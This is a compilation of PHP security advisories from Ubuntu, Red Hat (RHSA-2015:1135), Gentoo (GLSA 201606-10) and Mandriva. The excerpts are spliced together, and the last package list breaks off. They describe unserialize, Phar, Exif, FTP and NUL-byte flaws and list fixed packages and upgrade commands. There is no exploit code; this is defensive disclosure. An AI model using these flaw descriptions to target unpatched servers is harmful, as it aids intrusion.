Ubuntu 14.10: libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.4 php5-cgi 5.5.12+dfsg-2ubuntu4.4 php5-cli 5.5.12+dfsg-2ubuntu4.4 php5-fpm 5.5.12+dfsg-2ubuntu4.4
Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.9 php5-cgi 5.5.9+dfsg-1ubuntu4.9 php5-cli 5.5.9+dfsg-1ubuntu4.9 php5-fpm 5.5.9+dfsg-1ubuntu4.9
Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.18 php5-cgi 5.3.10-1ubuntu3.18 php5-cli 5.3.10-1ubuntu3.18 php5-fpm 5.3.10-1ubuntu3.18
Ubuntu 10.04 LTS: libapache2-mod-php5 5.3.2-1ubuntu4.30 php5-cgi 5.3.2-1ubuntu4.30 php5-cli 5.3.2-1ubuntu4.30
In general, a standard system update will make all the necessary changes. 6) - i386, x86_64
- (CVE-2014-9709)
A double free flaw was found in zend_ts_hash_graceful_destroy() function in the PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php security and bug fix update Advisory ID: RHSA-2015:1135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html Issue date: 2015-06-23 CVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-0232)
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. (CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2014-9652, CVE-2015-4604, CVE-2015-4605)
A heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)
A buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)
This update also fixes the following bugs:
-
The libgmp library in some cases terminated unexpectedly with a segmentation fault when being used with other libraries that use the GMP memory management. With this update, PHP no longer changes libgmp memory allocators, which prevents the described crash from occurring. (BZ#1212305)
-
When using the Open Database Connectivity (ODBC) API, the PHP process in some cases terminated unexpectedly with a segmentation fault. The underlying code has been adjusted to prevent this crash. (BZ#1212299)
-
Previously, running PHP on a big-endian system sometimes led to memory corruption in the fileinfo module. This update adjusts the behavior of the PHP pointer so that it can be freed without causing memory corruption. (BZ#1212298)
All php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize() 1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142) 1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c 1188599 - CVE-2014-9652 file: out of bounds read in mconvert() 1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c 1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone 1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict() 1194747 - CVE-2015-2301 php: use after free in phar_object.c 1204868 - CVE-2015-4147 php: SoapClient's __call() type confusion through unserialize() 1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re 1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name 1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1226916 - CVE-2015-4148 php: SoapClient's do_soap_call() type confusion after unserialize() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
ppc64: php-5.4.16-36.el7_1.ppc64.rpm php-cli-5.4.16-36.el7_1.ppc64.rpm php-common-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-gd-5.4.16-36.el7_1.ppc64.rpm php-ldap-5.4.16-36.el7_1.ppc64.rpm php-mysql-5.4.16-36.el7_1.ppc64.rpm php-odbc-5.4.16-36.el7_1.ppc64.rpm php-pdo-5.4.16-36.el7_1.ppc64.rpm php-pgsql-5.4.16-36.el7_1.ppc64.rpm php-process-5.4.16-36.el7_1.ppc64.rpm php-recode-5.4.16-36.el7_1.ppc64.rpm php-soap-5.4.16-36.el7_1.ppc64.rpm php-xml-5.4.16-36.el7_1.ppc64.rpm php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm
s390x: php-5.4.16-36.el7_1.s390x.rpm php-cli-5.4.16-36.el7_1.s390x.rpm php-common-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-gd-5.4.16-36.el7_1.s390x.rpm php-ldap-5.4.16-36.el7_1.s390x.rpm php-mysql-5.4.16-36.el7_1.s390x.rpm php-odbc-5.4.16-36.el7_1.s390x.rpm php-pdo-5.4.16-36.el7_1.s390x.rpm php-pgsql-5.4.16-36.el7_1.s390x.rpm php-process-5.4.16-36.el7_1.s390x.rpm php-recode-5.4.16-36.el7_1.s390x.rpm php-soap-5.4.16-36.el7_1.s390x.rpm php-xml-5.4.16-36.el7_1.s390x.rpm php-xmlrpc-5.4.16-36.el7_1.s390x.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.ael7b_1.src.rpm
ppc64le: php-5.4.16-36.ael7b_1.ppc64le.rpm php-cli-5.4.16-36.ael7b_1.ppc64le.rpm php-common-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-gd-5.4.16-36.ael7b_1.ppc64le.rpm php-ldap-5.4.16-36.ael7b_1.ppc64le.rpm php-mysql-5.4.16-36.ael7b_1.ppc64le.rpm php-odbc-5.4.16-36.ael7b_1.ppc64le.rpm php-pdo-5.4.16-36.ael7b_1.ppc64le.rpm php-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm php-process-5.4.16-36.ael7b_1.ppc64le.rpm php-recode-5.4.16-36.ael7b_1.ppc64le.rpm php-soap-5.4.16-36.ael7b_1.ppc64le.rpm php-xml-5.4.16-36.ael7b_1.ppc64le.rpm php-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: php-bcmath-5.4.16-36.el7_1.ppc64.rpm php-dba-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-devel-5.4.16-36.el7_1.ppc64.rpm php-embedded-5.4.16-36.el7_1.ppc64.rpm php-enchant-5.4.16-36.el7_1.ppc64.rpm php-fpm-5.4.16-36.el7_1.ppc64.rpm php-intl-5.4.16-36.el7_1.ppc64.rpm php-mbstring-5.4.16-36.el7_1.ppc64.rpm php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm php-pspell-5.4.16-36.el7_1.ppc64.rpm php-snmp-5.4.16-36.el7_1.ppc64.rpm
s390x: php-bcmath-5.4.16-36.el7_1.s390x.rpm php-dba-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-devel-5.4.16-36.el7_1.s390x.rpm php-embedded-5.4.16-36.el7_1.s390x.rpm php-enchant-5.4.16-36.el7_1.s390x.rpm php-fpm-5.4.16-36.el7_1.s390x.rpm php-intl-5.4.16-36.el7_1.s390x.rpm php-mbstring-5.4.16-36.el7_1.s390x.rpm php-mysqlnd-5.4.16-36.el7_1.s390x.rpm php-pspell-5.4.16-36.el7_1.s390x.rpm php-snmp-5.4.16-36.el7_1.s390x.rpm
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: php-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm php-dba-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-devel-5.4.16-36.ael7b_1.ppc64le.rpm php-embedded-5.4.16-36.ael7b_1.ppc64le.rpm php-enchant-5.4.16-36.ael7b_1.ppc64le.rpm php-fpm-5.4.16-36.ael7b_1.ppc64le.rpm php-intl-5.4.16-36.ael7b_1.ppc64le.rpm php-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm php-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm php-pspell-5.4.16-36.ael7b_1.ppc64le.rpm php-snmp-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8142 https://access.redhat.com/security/cve/CVE-2014-9652 https://access.redhat.com/security/cve/CVE-2014-9705 https://access.redhat.com/security/cve/CVE-2014-9709 https://access.redhat.com/security/cve/CVE-2015-0231 https://access.redhat.com/security/cve/CVE-2015-0232 https://access.redhat.com/security/cve/CVE-2015-0273 https://access.redhat.com/security/cve/CVE-2015-2301 https://access.redhat.com/security/cve/CVE-2015-2348 https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-2787 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4147 https://access.redhat.com/security/cve/CVE-2015-4148 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4599 https://access.redhat.com/security/cve/CVE-2015-4600 https://access.redhat.com/security/cve/CVE-2015-4601 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201606-10
https://security.gentoo.org/
Severity: Normal Title: PHP: Multiple vulnerabilities Date: June 19, 2016 Bugs: #537586, #541098, #544186, #544330, #546872, #549538, #552408, #555576, #555830, #556952, #559612, #562882, #571254, #573892, #577376 ID: 201606-10
Synopsis
Multiple vulnerabilities have been found in PHP, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Background
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
[ 1 ] CVE-2013-6501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501 [ 2 ] CVE-2014-9705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705 [ 3 ] CVE-2014-9709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709 [ 4 ] CVE-2015-0231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231 [ 5 ] CVE-2015-0273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273 [ 6 ] CVE-2015-1351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351 [ 7 ] CVE-2015-1352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352 [ 8 ] CVE-2015-2301 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301 [ 9 ] CVE-2015-2348 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348 [ 10 ] CVE-2015-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783 [ 11 ] CVE-2015-2787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787 [ 12 ] CVE-2015-3329 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329 [ 13 ] CVE-2015-3330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330 [ 14 ] CVE-2015-4021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021 [ 15 ] CVE-2015-4022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022 [ 16 ] CVE-2015-4025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025 [ 17 ] CVE-2015-4026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026 [ 18 ] CVE-2015-4147 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147 [ 19 ] CVE-2015-4148 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148 [ 20 ] CVE-2015-4642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642 [ 21 ] CVE-2015-4643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643 [ 22 ] CVE-2015-4644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644 [ 23 ] CVE-2015-6831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831 [ 24 ] CVE-2015-6832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832 [ 25 ] CVE-2015-6833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833 [ 26 ] CVE-2015-6834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834 [ 27 ] CVE-2015-6835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835 [ 28 ] CVE-2015-6836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836 [ 29 ] CVE-2015-6837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837 [ 30 ] CVE-2015-6838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838 [ 31 ] CVE-2015-7803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803 [ 32 ] CVE-2015-7804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Buffer Overflow when parsing tar/zip/phar in phar_set_inode (CVE-2015-3329).
Potential remote code execution with apache 2.4 apache2handler (CVE-2015-3330).
Additionally the timezonedb packages has been upgraded to the latest version and the PECL packages which requires so has been rebuilt for php-5.5.24.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330 http://advisories.mageia.org/MGASA-2015-0169.html
Updated Packages:
Mandriva Business Server 1/X86_64: fb5b4628263a821fb3e4075a5fb4e5b4 mbs1/x86_64/apache-mod_php-5.5.24-1.mbs1.x86_64.rpm 3c7f76ada5ccad65c212ee350fdffe87 mbs1/x86_64/lib64php5_common5-5.5.24-1.mbs1.x86_64.rpm 5400e21c3eaecc346e1eb8c712e9478f mbs1/x86_64/php-apc-3.1.15-1.18.mbs1.x86_64.rpm 90ae23234441a8de169207ff7f045684 mbs1/x86_64/php-apc-admin-3.1.15-1.18.mbs1.x86_64.rpm a39b53bcacc941035d830ce1052540b3 mbs1/x86_64/php-bcmath-5.5.24-1.mbs1.x86_64.rpm ada97c19882cf313e4d7ebba0909f6d8 mbs1/x86_64/php-bz2-5.5.24-1.mbs1.x86_64.rpm c6e5c880827c6bc76dfb1c15460637b4 mbs1/x86_64/php-calendar-5.5.24-1.mbs1.x86_64.rpm 6535a7223184cec5ac17edb9e1d31388 mbs1/x86_64/php-cgi-5.5.24-1.mbs1.x86_64.rpm 16aa52d7dd47cc27cb5d7aec420944eb mbs1/x86_64/php-cli-5.5.24-1.mbs1.x86_64.rpm 7983f9d1bf3039b5efdb0ed70329cccd mbs1/x86_64/php-ctype-5.5.24-1.mbs1.x86_64.rpm 3cbc805a1610b54d191e2e3ca99c3ae4 mbs1/x86_64/php-curl-5.5.24-1.mbs1.x86_64.rpm f53dd6f08013c00ae1c95df14671624e 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mbs1/x86_64/php-mysqlnd-5.5.24-1.mbs1.x86_64.rpm f27cbd0c9f968bfa7d6f10d8040a1f4f mbs1/x86_64/php-odbc-5.5.24-1.mbs1.x86_64.rpm db18ba83bd3e8f82f189c4e93799de9a mbs1/x86_64/php-opcache-5.5.24-1.mbs1.x86_64.rpm 7e02eaad2751f993fcd7af5a649b4707 mbs1/x86_64/php-openssl-5.5.24-1.mbs1.x86_64.rpm be43bdb8b4c0ea65901bb7ab4a12e1be mbs1/x86_64/php-pcntl-5.5.24-1.mbs1.x86_64.rpm 57ba222e0921de0efcad052a1ed359cc mbs1/x86_64/php-pdo-5.5.24-1.mbs1.x86_64.rpm 3ba50d22dead03f756136363e1e2ce27 mbs1/x86_64/php-pdo_dblib-5.5.24-1.mbs1.x86_64.rpm fe6858486fc7a42f7099f103fec8e0c9 mbs1/x86_64/php-pdo_mysql-5.5.24-1.mbs1.x86_64.rpm 407570e83b281be3515970aa6e24a773 mbs1/x86_64/php-pdo_odbc-5.5.24-1.mbs1.x86_64.rpm e5c66883133694a146b0f4840749a7d7 mbs1/x86_64/php-pdo_pgsql-5.5.24-1.mbs1.x86_64.rpm d41508abccb63d3b0c0d44a82596f1d6 mbs1/x86_64/php-pdo_sqlite-5.5.24-1.mbs1.x86_64.rpm 3f7dd514cca5b5259854043194099c4c mbs1/x86_64/php-pgsql-5.5.24-1.mbs1.x86_64.rpm 1b6b8a0d2e033b35697757a49329d51e mbs1/x86_64/php-phar-5.5.24-1.mbs1.x86_64.rpm 30e86f3079cd49241d680f46542b16b8 mbs1/x86_64/php-posix-5.5.24-1.mbs1.x86_64.rpm b065951f2e32008908857708ae2f1539 mbs1/x86_64/php-readline-5.5.24-1.mbs1.x86_64.rpm 13886e31952529313c505acbc7ebbbc6 mbs1/x86_64/php-recode-5.5.24-1.mbs1.x86_64.rpm 95ca2a29237d6f3e6f852431626be072 mbs1/x86_64/php-session-5.5.24-1.mbs1.x86_64.rpm f5f33541bc2a3b3f0b456989e20aa45c mbs1/x86_64/php-shmop-5.5.24-1.mbs1.x86_64.rpm c5414a148aa0e25b03b9faf79c50693a mbs1/x86_64/php-snmp-5.5.24-1.mbs1.x86_64.rpm d02afd660db7544b09328445c2f99ec6 mbs1/x86_64/php-soap-5.5.24-1.mbs1.x86_64.rpm 239a1c675cf3a4f853cc94cfc188e60e mbs1/x86_64/php-sockets-5.5.24-1.mbs1.x86_64.rpm 